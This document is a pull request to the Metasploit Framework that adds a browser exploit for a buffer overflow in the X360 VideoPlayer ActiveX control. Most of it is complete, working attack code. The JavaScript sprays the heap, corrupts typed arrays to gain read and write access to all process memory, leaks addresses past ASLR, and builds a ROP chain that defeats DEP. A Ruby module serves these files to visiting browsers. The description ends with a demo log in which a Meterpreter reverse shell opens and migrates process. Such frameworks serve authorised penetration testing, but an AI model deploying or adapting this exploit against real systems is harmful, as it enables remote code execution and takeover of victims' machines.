### PR TITLE
Add module for EDB-35948, X360 Software actvx buffer overflow

### DIFF
--- a/data/exploits/edb-35948/js/exploit.js
+++ b/data/exploits/edb-35948/js/exploit.js
@@ -16,6 +16,7 @@ var Exploit = function () {
 };
 
 Exploit.prototype.run = function() {
+    CollectGarbage();
     this.sprayer = new Sprayer();
     this.sprayer.spray();
 

--- a/data/exploits/edb-35948/js/exploit.js
+++ b/data/exploits/edb-35948/js/exploit.js
@@ -1,0 +1,125 @@
+var Exploit = function () {
+    // create its vulnerable ActiveX object (as HTMLObjectElement)
+    this.obj = document.createElement("object");
+    this.obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");
+    // perform controlled memwrite to 0x1111f010: typed array header is at
+    // 0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
+    // 0x00000001 0x00000004 0x00000040 0x1111f030 0x00
+    // The first 3 dwords are sideeffects due to the code we abuse for the
+    // controlled memcpy
+    this.whereAddress = 0x1111f010;
+    this.memory = null;
+    this.addresses = new Object();
+    this.sprayer = null;
+    this.informer = null;
+    this.sc = "<%=shellcode%>";
+};
+
+Exploit.prototype.run = function() {
+    this.sprayer = new Sprayer();
+    this.sprayer.spray();
+
+    this.memory = this.doCorruption();
+
+    //alert(this.memory.length.toString(16))
+    if (this.memory.length != 0x7fffffff){
+        //alert("Cannot change Uint32Array length");
+        return -1;
+    }
+
+    // now we could even repair the change we did with memcpy ...
+
+    this.informer = new Informer(this.sprayer.corruptedArrayNext, this.memory, this.whereAddress);
+    var leakSuccess = this.leakAddresses();
+
+    if (leakSuccess != 0) {
+        //alert("Cannot leak required address to build the ROP chain");
+        return leakSuccess;
+    }
+
+    var ropBuilder = new RopBuilder(this.informer, this.addresses, this.sc.length);
+    ropBuilder.buildRop();
+
+    // manipulate object data to gain EIP control with "Play" method
+    var videopObj = this.memory[this.addresses['objAddress'] / 4 + 26];
+    this.memory[(videopObj - 0x10) / 4] = ropBuilder.ropAddress; // rop address will be used in EAX in below call
+
+    // eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
+    this.obj.Play()
+};
+
+Exploit.prototype.prepareOverflow = function() {
+    // prepare buffer with address we want to write to
+    var ptrBuf = "";
+    // fill buffer: length = relative pointer address - buffer start + pointer
+    // offset
+    while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)) { ptrBuf += "A" }
+    ptrBuf += this.dword2str(this.whereAddress);
+
+    return ptrBuf;
+};
+
+Exploit.prototype.doCorruption = function() {
+    var ptrBuf = this.prepareOverflow();
+
+    // trigger: overflow buffer and overwrite the pointer value after buffer
+    this.obj.SetText(ptrBuf, 0, 0);
+    //alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")
+
+    // use overwritten pointer after buffer with method "SetFontName" to conduct
+    // memory write.  We overwrite a typed array's header length to 0x40 and let
+    // its buffer point to the next typed array header at 0x1111f030 (see above)
+    this.obj.SetFontName(this.dword2str(this.whereAddress + 0x20)); // WHAT TO WRITE
+
+
+    if (this.sprayer.find() == -1){
+        //alert("cannot find corrupted Uint32Array");
+        return -1
+    }
+
+    // modify subsequent Uint32Array to be able to RW all process memory
+    this.sprayer.corruptedArray[6] = 0x7fffffff; // next Uint32Array length
+    this.sprayer.corruptedArray[7] = 0; // set buffer of next Uint32Array to start of process mem
+
+    // our memory READWRITE interface :)
+    return this.sprayer.fullMemory;
+};
+
+Exploit.prototype.leakAddresses = function() {
+    this.addresses['objAddress'] = this.informer.leakVideoPlayerAddress(this.obj);
+
+    this.addresses['base'] = this.informer.leakVideoPlayerBase(this.obj);
+
+    // check if we have the image of VideoPlayer.ocx
+    // check for MZ9000 header and "Vide" string at offset 0x6a000
+    if (this.memory[this.addresses['base'] / 4] != 0x905a4d ||
+        this.memory[(this.addresses['base'] + 0x6a000) / 4] != 0x65646956){
+        //alert("Cannot find VideoPlayer.ocx base or its version is wrong");
+        return -1;
+    }
+    //alert(this.addresses['base'].toString(16))
+
+    // get VirtualAlloc from imports of VideoPlayer.ocx
+    this.addresses['virtualAlloc'] = this.memory[(this.addresses['base'] + 0x69174)/4];
+    // memcpy is available inside VideoPlayer.ocx
+    this.addresses['memcpy'] = this.addresses['base'] + 0x15070;
+    //alert("0x" + this.addresses['virtualAlloc'].toString(16) + " " + "0x" + this.addresses['memcpy'].toString(16))
+
+    scBuf = new Uint8Array(this.sc.length);
+    for (n=0; n < this.sc.length; n++){
+        scBuf[n] = this.sc.charCodeAt(n);
+    }
+
+    this.addresses['shellcode'] = this.informer.leakShellcodeAddress(scBuf);
+
+    return 0;
+};
+
+// dword to little endian string
+Exploit.prototype.dword2str = function(dword) {
+    var str = "";
+    for (var n=0; n < 4; n++){
+        str += String.fromCharCode((dword >> 8 * n) & 0xff);
+    }
+    return str;
+};

--- a/data/exploits/edb-35948/js/informer.js
+++ b/data/exploits/edb-35948/js/informer.js
@@ -1,0 +1,52 @@
+var Informer = function(infArray, mem, ref) {
+    this.infoLeakArray = infArray;
+    this.memoryArray =  mem;
+    this.referenceAddress = ref;
+};
+
+// Calculate VideoPlayer.ocx base
+Informer.prototype.leakVideoPlayerBase = function(videoPlayerObj) {
+    this.infoLeakArray[0] = videoPlayerObj; // set HTMLObjectElement as first element
+    //alert(mem[0x11120020/4].toString(16))
+    var arrayElemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // leak array elem. @ 0x11120020 (obj)
+    var objPtr = this.memoryArray[arrayElemPtr/4 + 6]; // deref array elem. + 0x18
+    var heapPtrVideoplayer = this.memoryArray[objPtr/4 + 25]; // deref HTMLObjectElement + 0x64
+    // deref heap pointer containing VideoPlayer.ocx pointer
+    var videoplayerPtr = this.memoryArray[heapPtrVideoplayer/4];
+    var base = videoplayerPtr - 0x6b3b0; // calculate base
+
+    return base;
+};
+
+// Calculate VideoPlayer object addres
+Informer.prototype.leakVideoPlayerAddress = function(videoPlayerObj) {
+    this.infoLeakArray[0] = videoPlayerObj; // set HTMLObjectElement as first element
+    //alert(mem[0x11120020/4].toString(16))
+    var arrayElemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // leak array elem. @ 0x11120020 (obj)
+    var objPtr = this.memoryArray[arrayElemPtr/4 + 6]; // deref array elem. + 0x18
+
+    return objPtr;
+};
+
+// Calculate the shellcode address
+Informer.prototype.leakShellcodeAddress = function(shellcodeBuffer) {
+    this.infoLeakArray[0] = shellcodeBuffer;
+    // therefore, leak array element at 0x11120020 (typed array header of
+    // Uint8Array containing shellcode) ...
+    var elemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4];
+    // ...and deref array element + 0x1c (=> leak shellcode's buffer address)
+    var shellcodeAddr = this.memoryArray[(elemPtr/4) + 7]
+
+    return shellcodeAddr;
+};
+
+
+Informer.prototype.leakRopAddress = function(ropArray) {
+    this.infoLeakArray[0] = ropArray
+    // leak array element at 0x11120020 (typed array header)
+    var elemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4];
+    // deref array element + 0x1c (leak rop's buffer address)
+    var ropAddr = this.memoryArray[(elemPtr/4) + 7]  // payload address
+
+    return ropAddr;
+};

--- a/data/exploits/edb-35948/js/rop_builder.js
+++ b/data/exploits/edb-35948/js/rop_builder.js
@@ -8,14 +8,14 @@ var RopBuilder = function(informer, addresses, scLength) {
     this.scLength = scLength;
 };
 
-// Calculate VideoPlayer.ocx base
+// Build the ROP chain to bypass DEP
 RopBuilder.prototype.buildRop = function() {
     // ROP chain (rets in comments are omitted)
     // we perform:
     // (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
     // memcpy(EAX, shellcode, shellcodeLen)
     // (void(*)())EAX()
-    var offs = 0x30/4;                                     // offset to chain after CALL [EAX+0x30]
+    var offs = 0x30/4;                                 // offset to chain after CALL [EAX+0x30]
     this.rop[0] = this.base + 0x1ff6;                  // ADD ESP, 0x30;
     this.rop[offs + 0x0] = this.base + 0x1ea1e;        // XCHG EAX, ESP; <-- first gadget called
     this.rop[offs + 0x1] = this.virtualAlloc;          // allocate RWX mem (address avail. in EAX)

--- a/data/exploits/edb-35948/js/rop_builder.js
+++ b/data/exploits/edb-35948/js/rop_builder.js
@@ -21,7 +21,7 @@ RopBuilder.prototype.buildRop = function() {
     this.rop[offs + 0x1] = this.virtualAlloc;          // allocate RWX mem (address avail. in EAX)
     this.rop[offs + 0x2] = this.base + 0x10e9;         // POP ECX; => pop the value at offs + 0x7
     this.rop[offs + 0x3] = 0;                          // lpAddress
-    this.rop[offs + 0x4] = 0x1000;                     // dwSize (0x1000)
+    this.rop[offs + 0x4] = 0x4000;                     // dwSize (0x4000)
     this.rop[offs + 0x5] = 0x1000;                     // flAllocationType (MEM_COMMIT)
     this.rop[offs + 0x6] = 0x40;                       // flProtect (PAGE_EXECUTE_READWRITE)
     this.rop[offs + 0x7] = this.ropAddress + (offs+0xe)*4;  // points to memcpy's dst param (*2)

--- a/data/exploits/edb-35948/js/rop_builder.js
+++ b/data/exploits/edb-35948/js/rop_builder.js
@@ -1,0 +1,38 @@
+var RopBuilder = function(informer, addresses, scLength) {
+    this.rop = new Uint32Array(0x1000);
+    this.ropAddress = informer.leakRopAddress(this.rop);
+    this.base = addresses['base'];
+    this.virtualAlloc = addresses['virtualAlloc'];
+    this.memcpy = addresses['memcpy'];
+    this.scAddr = addresses['shellcode'];
+    this.scLength = scLength;
+};
+
+// Calculate VideoPlayer.ocx base
+RopBuilder.prototype.buildRop = function() {
+    // ROP chain (rets in comments are omitted)
+    // we perform:
+    // (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
+    // memcpy(EAX, shellcode, shellcodeLen)
+    // (void(*)())EAX()
+    var offs = 0x30/4;                                     // offset to chain after CALL [EAX+0x30]
+    this.rop[0] = this.base + 0x1ff6;                  // ADD ESP, 0x30;
+    this.rop[offs + 0x0] = this.base + 0x1ea1e;        // XCHG EAX, ESP; <-- first gadget called
+    this.rop[offs + 0x1] = this.virtualAlloc;          // allocate RWX mem (address avail. in EAX)
+    this.rop[offs + 0x2] = this.base + 0x10e9;         // POP ECX; => pop the value at offs + 0x7
+    this.rop[offs + 0x3] = 0;                          // lpAddress
+    this.rop[offs + 0x4] = 0x1000;                     // dwSize (0x1000)
+    this.rop[offs + 0x5] = 0x1000;                     // flAllocationType (MEM_COMMIT)
+    this.rop[offs + 0x6] = 0x40;                       // flProtect (PAGE_EXECUTE_READWRITE)
+    this.rop[offs + 0x7] = this.ropAddress + (offs+0xe)*4;  // points to memcpy's dst param (*2)
+    this.rop[offs + 0x8] = this.base + 0x1c743;        // MOV [ECX], EAX; => set dst to RWX mem
+    this.rop[offs + 0x9] = this.base + 0x10e9;         // POP ECX;
+    this.rop[offs + 0xa] = this.ropAddress + (offs+0xd)*4;  // points to (*1) in chain
+    this.rop[offs + 0xb] = this.base + 0x1c743;        // MOV [ECX], EAX; => set return to RWX mem
+    this.rop[offs + 0xc] = this.memcpy;
+    this.rop[offs + 0xd] = 0xffffffff;                 // (*1): ret addr to RWX mem filled at runtime
+    this.rop[offs + 0xe] = 0xffffffff;                 // (*2): dst for memcpy filled at runtime
+    this.rop[offs + 0xf] = this.scAddr;                // shellcode src addr to copy to RWX mem (param2)
+    this.rop[offs + 0x10] = this.scLength;             // length  of shellcode (param3)
+};
+

--- a/data/exploits/edb-35948/js/sprayer.js
+++ b/data/exploits/edb-35948/js/sprayer.js
@@ -1,0 +1,58 @@
+var Sprayer = function () {
+    // amount of arrays to create on the heap
+    this.nrArrays = 0x1000;
+    // size of data in one array block: 0xefe0 bytes =>
+    // subract array header (0x20) and space for typed array headers (0x1000)
+    // from 0x10000
+    this.arrSize =  (0x10000-0x20-0x1000)/4;
+    // heap array container will hold our heap sprayed data
+    this.arr = new Array(this.nrArrays);
+    // use one buffer for all typed arrays
+    this.intArrBuf = new ArrayBuffer(4);
+    this.corruptedArray = null;
+    this.corruptedArrayNext = null;
+};
+
+// Spray the heap with array data blocks and subsequent typed array headers
+// of type Uint32Array
+Sprayer.prototype.spray = function() {
+    var k = 0;
+    while(k < this.nrArrays) {
+        // create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
+        // aligned at 0xXXXX0020)
+        this.arr[k] = new Array(this.arrSize);
+
+        // fill remaining page (0x1000) after array data with headers of
+        // "jscript9!Js::TypedArray<unsigned int>"  (0x55 * 0x30 = 0xff0) as a
+        // typed array header has the size of 0x30. 0x10 bytes are left empty
+        for(var i = 0; i < 0x55; i++){
+            // headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,...
+            this.arr[k][i] = new Uint32Array(this.intArrBuf, 0, 1);
+        }
+
+        // tag the array's last element
+        this.arr[k][this.arrSize - 1] = 0x12121212;
+        k += 1;
+    }
+};
+
+// Find the corrupted Uint32Array (typed array)
+Sprayer.prototype.find = function() {
+    var k = 0;
+
+    while(k < this.nrArrays - 1) {
+        for(var i = 0; i < 0x55-1; i++){
+            if(this.arr[k][i][0] != 0){
+                // address of jscript9!Js::TypedArray<unsigned int>::`vftable'
+                // alert("0x" + arr[k][i][0].toString(16))
+                this.corruptedArray = this.arr[k][i];
+                this.corruptedArrayNext = this.arr[k+1];
+                this.fullMemory = this.arr[k][i+1];
+                return 1;
+            }
+        }
+        k++;
+    }
+
+    return -1;
+};

--- a/data/exploits/edb-35948/main.html
+++ b/data/exploits/edb-35948/main.html
@@ -1,0 +1,11 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <script src="js/exploit.js"></script>
+    <script src="js/sprayer.js"></script>
+    <script src="js/informer.js"></script>
+    <script src="js/rop_builder.js"></script>
+</head>
+<body onload="e = new Exploit(); e.run();">
+</body>
+</html>

--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
+++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
@@ -96,9 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def main_template(cli, target_info)
     path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
-    f = File.new(path, 'rb')
-    template = f.read
-    f.close
+    template = ''
+    File.open(path, 'rb') { |f| template = strip_comments(f.read) }
 
     return template, binding()
   end
@@ -107,36 +106,32 @@ class Metasploit3 < Msf::Exploit::Remote
     shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
 
     path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
-    f = File.new(path, 'rb')
-    template = strip_comments(f.read)
-    f.close
+    template = ''
+    File.open(path, 'rb') { |f| template = strip_comments(f.read) }
 
     return template, binding()
   end
 
   def sprayer_template(cli, target_info)
     path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
-    f = File.new(path, 'rb')
-    template = strip_comments(f.read)
-    f.close
+    template = ''
+    File.open(path, 'rb') { |f| template = strip_comments(f.read) }
 
     return template, binding()
   end
 
   def informer_template(cli, target_info)
     path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
-    f = File.new(path, 'rb')
-    template = strip_comments(f.read)
-    f.close
+    template = ''
+    File.open(path, 'rb') { |f| template = strip_comments(f.read) }
 
     return template, binding()
   end
 
   def rop_builder_template(cli, target_info)
     path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
-    f = File.new(path, 'rb')
-    template = strip_comments(f.read)
-    f.close
+    template = ''
+    File.open(path, 'rb') { |f| template = strip_comments(f.read) }
 
     return template, binding()
   end

--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
+++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
@@ -1,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => "X360 VideoPlayer ActiveX Control Buffer Overflow",
+      'Description'         => %q{
+        This module exploits a based buffer overflow in the VideoPlayer.ocx ActiveX installed
+        with the X360 Software. By setting an overly long value to 'ConvertFile()',an attacker
+        can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Rh0',     # vulnerability discovery and exploit, all the hard work
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['EDB', '35948'],
+          ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']
+        ],
+      'Payload'             =>
+        {
+          'Space'          => 1024,
+          'DisableNops'    => true,
+          'PrependEncoder' => stack_adjust
+        },
+      'DefaultOptions'      =>
+        {
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'Platform'            => 'win',
+      'Arch'                => ARCH_X86,
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :clsid   => "{4B3476C6-185A-4D19-BB09-718B565FA67B}",
+          :os_name => OperatingSystems::Match::WINDOWS,
+          :ua_name => Msf::HttpClients::IE,
+          :ua_ver  => '10.0'
+        },
+      'Targets'             =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => "Jan 30 2015",
+      'DefaultTarget'       => 0))
+  end
+
+  def stack_adjust
+    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
+    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
+    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
+    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
+
+    adjust
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    case request.uri
+    when /exploit.js/
+      print_status("Sending exploit.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, exploit_template(cli, target_info), headers)
+    when /sprayer.js/
+      print_status("Sending sprayer.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, sprayer_template(cli, target_info), headers)
+    when /informer.js/
+      print_status("Sending informer.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, informer_template(cli, target_info), headers)
+    when /rop_builder.js/
+      print_status("Sending rop_builder.js...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
+      send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
+    else
+      print_status("Sending main.html...")
+      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
+      send_exploit_html(cli, main_template(cli, target_info), headers)
+    end
+  end
+
+  def main_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
+    f = File.new(path, 'rb')
+    template = f.read
+    f.close
+
+    return template, binding()
+  end
+
+  def exploit_template(cli, target_info)
+    shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
+
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def sprayer_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def informer_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def rop_builder_template(cli, target_info)
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
+    f = File.new(path, 'rb')
+    template = strip_comments(f.read)
+    f.close
+
+    return template, binding()
+  end
+
+  def strip_comments(input)
+    input.gsub(/\/\/.*$/, '')
+  end
+
+end

--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
+++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'                => "X360 VideoPlayer ActiveX Control Buffer Overflow",
       'Description'         => %q{
-        This module exploits a based buffer overflow in the VideoPlayer.ocx ActiveX installed
-        with the X360 Software. By setting an overly long value to 'ConvertFile()',an attacker
-        can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
+        This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
+        X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
+        a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>


### PR DESCRIPTION
Full bug history here: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/

The exploit is kinda nice because bypasses ASLR/DEP from a .data buffer overflow. So, it's a nice case study, and worths to have it into the framework I think!
## Verification
- [x] Install Windows 7 SP1
- [x] Install IE 10
- [x] Install the vulnerable software. The version I downloaded from: http://www.x360soft.com/demo/videoplayersetup.exe was vulnerable
- [x] Allow the vulnerable ActiveX to run with IE. Just load any web page using the control and allow IE to use it.
- [x] From the framework con sole, use the module (see demo)
- [x] Set srvhost, payload and lhost (see demo)
- [x] exploit, visit the link from the victim, hopefully get sessions!
## DEMO

```
msf > use exploit/windows/browser/x360_video_player_set_text_bof
msf exploit(x360_video_player_set_text_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(x360_video_player_set_text_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(x360_video_player_set_text_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(x360_video_player_set_text_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(x360_video_player_set_text_bof) > [*] Using URL: http://172.16.158.1:8080/m82H3OcyvAWMQ
[*] Server started.
[*] 172.16.158.131   x360_video_player_set_text_bof - Gathering target information.
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending response HTML.
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/exploit.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending exploit.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/sprayer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending sprayer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/informer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending informer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/rop_builder.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending rop_builder.js...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49171) at 2015-02-06 14:56:26 -0600
[*] Session ID 1 (172.16.158.1:4444 -> 172.16.158.131:49171) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3180)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3556
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[+] Successfully migrated to process

msf exploit(x360_video_player_set_text_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit
```
